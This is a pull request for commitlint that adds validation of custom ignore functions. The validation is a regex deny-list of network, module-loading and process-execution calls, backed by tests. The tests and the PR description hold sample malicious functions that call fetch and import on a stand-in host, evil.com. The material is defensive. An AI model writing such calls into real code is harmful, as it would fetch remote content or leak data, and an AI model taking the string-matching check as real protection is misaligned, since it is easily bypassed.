### PR TITLE
fix(is-ignored): introduce security validation for custom ignore functions

### DIFF
--- a/@commitlint/is-ignored/src/is-ignored.test.ts
+++ b/@commitlint/is-ignored/src/is-ignored.test.ts
@@ -1,6 +1,7 @@
 import {test, expect} from 'vitest';
 
 import isIgnored from './is-ignored.js';
+import {Matcher} from '@commitlint/types';
 
 const VERSION_MESSAGES = [
 	'0.0.1',
@@ -204,4 +205,65 @@ test('should throw error if any element of ignores is not a function', () => {
 			ignores: ['throws error'],
 		} as any);
 	}).toThrow('ignores must be array of type function, received items of type:');
+});
+
+test('should throw error if custom ignore function returns non-boolean value', () => {
+	const testCases = [
+		() => 1, // number
+		() => 'true', // string
+		() => undefined, // undefined
+		() => null, // null
+		() => ({}), // object
+		() => [], // array
+	];
+
+	testCases.forEach((testFn) => {
+		expect(() => {
+			isIgnored('some commit', {
+				ignores: [testFn as unknown as Matcher],
+			});
+		}).toThrow('Ignore function must return a boolean');
+	});
+});
+
+test('should throw error for custom ignore functions with security risks', () => {
+	const maliciousPatterns = [
+		'function() { fetch("https://evil.com"); return true; }',
+		'function() { import("https://evil.com"); return true; }',
+		'function() { require("fs"); return true; }',
+		'function() { process.exec("ls"); return true; }',
+		'function() { process.spawn("ls"); return true; }',
+		'function() { process.execFile("ls"); return true; }',
+		'function() { process.execSync("ls"); return true; }',
+		'function() { new XMLHttpRequest(); return true; }',
+	];
+
+	maliciousPatterns.forEach((fnString) => {
+		const fn = new Function(`return ${fnString}`)();
+		expect(() => {
+			isIgnored('some commit', {
+				ignores: [fn],
+			});
+		}).toThrow('Ignore function contains forbidden pattern');
+	});
+});
+
+test('should not throw error for custom ignore functions without security risks', () => {
+	const safePatterns = [
+		'function(commit) { return commit === "some commit"; }',
+		'function(commit) { return commit.startsWith("some"); }',
+		'function(commit) { return commit.includes("some"); }',
+		'function(commit) { return commit.length < 10 && commit.includes("some"); }',
+		'function(commit) { return commit.length < 10 || commit.includes("fetch"); }',
+		'function(commit) { return commit.includes("exec"); }',
+	];
+
+	safePatterns.forEach((fnString) => {
+		const fn = new Function(`return ${fnString}`)();
+		expect(() => {
+			isIgnored('some commit', {
+				ignores: [fn],
+			});
+		}).not.toThrow();
+	});
 });

--- a/@commitlint/is-ignored/src/is-ignored.ts
+++ b/@commitlint/is-ignored/src/is-ignored.ts
@@ -1,5 +1,6 @@
 import {wildcards} from './defaults.js';
 import {IsIgnoredOptions} from '@commitlint/types';
+import {validateIgnoreFunction} from './validate-ignore-func.js';
 
 export default function isIgnored(
 	commit: string = '',
@@ -13,6 +14,9 @@ export default function isIgnored(
 		);
 	}
 
+	// Validate ignore functions
+	ignores.forEach(validateIgnoreFunction);
+
 	const invalids = ignores.filter((c) => typeof c !== 'function');
 
 	if (invalids.length > 0) {
@@ -24,5 +28,13 @@ export default function isIgnored(
 	}
 
 	const base = opts.defaults === false ? [] : wildcards;
-	return [...base, ...ignores].some((w) => w(commit));
+	return [...base, ...ignores].some((w) => {
+		const result = w(commit);
+		if (typeof result !== 'boolean') {
+			throw new Error(
+				`Ignore function must return a boolean, received ${typeof result}`
+			);
+		}
+		return result;
+	});
 }

--- a/@commitlint/is-ignored/src/validate-ignore-func.ts
+++ b/@commitlint/is-ignored/src/validate-ignore-func.ts
@@ -1,0 +1,16 @@
+import {Matcher} from '@commitlint/types';
+
+export function validateIgnoreFunction(fn: Matcher) {
+	const fnString = fn.toString();
+
+	// Check for dangerous patterns
+	const dangerousPattern =
+		/(?:process|require|import|eval|fetch|XMLHttpRequest|fs|child_process)(?:\s*\.|\s*\()|(?:exec|execFile|spawn)\s*\(/;
+	if (dangerousPattern.test(fnString)) {
+		// Find which pattern matched for a more specific error message
+		const match = fnString.match(dangerousPattern);
+		throw new Error(
+			`Ignore function contains forbidden pattern: ${match?.[0].trim()}`
+		);
+	}
+}


### PR DESCRIPTION
<!--- Provide a general summary of your changes in the Title above -->

## Description

<!--- Describe your changes in detail -->
This PR improves security validation in the `@commitlint/is-ignored` package by introducing a regex pattern to catch potentially malicious function calls.

## Motivation and Context

<!--- Why is this change required? What problem does it solve? -->
<!--- If it fixes an open issue, please link to the issue here. -->
The current security validation in `is-ignored` only performs type validation on the Matcher, this PR adds a more strict check and throws if the function does not returns a Boolean, plus it checks for potentially dangerous side effects (e.g., `fetch("url")`) that could potentially allow malicious code to be executed through custom ignore functions.

## Usage examples

<!--- Provide examples of intended usage -->

```js
// commitlint.config.js
module.exports = {
  ignores: [
    // This will now be caught as potentially dangerous
    commit => {
      fetch("https://evil.com");
      return true;
    },
    // This remains valid
    commit => commit.includes("fetch")
  ]
};
```

## How Has This Been Tested?

<!--- Please describe in detail how you tested your changes. -->
- Added new test cases for various malicious patterns in custom ignore functions
- Added tests for safe patterns to ensure no false positives
- Added tests to verify proper error messages
- Verified all existing tests continue to pass
- Manual testing with various function patterns

## Types of changes

<!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: -->

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to change)

## Checklist:

<!--- Go over all the following points, and put an `x` in all the boxes that apply. See the README for information on testing. -->
<!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! -->

- [ ] My change requires a change to the documentation.
- [ ] I have updated the documentation accordingly.
- [x] I have added tests to cover my changes.
- [x] All new and existing tests passed.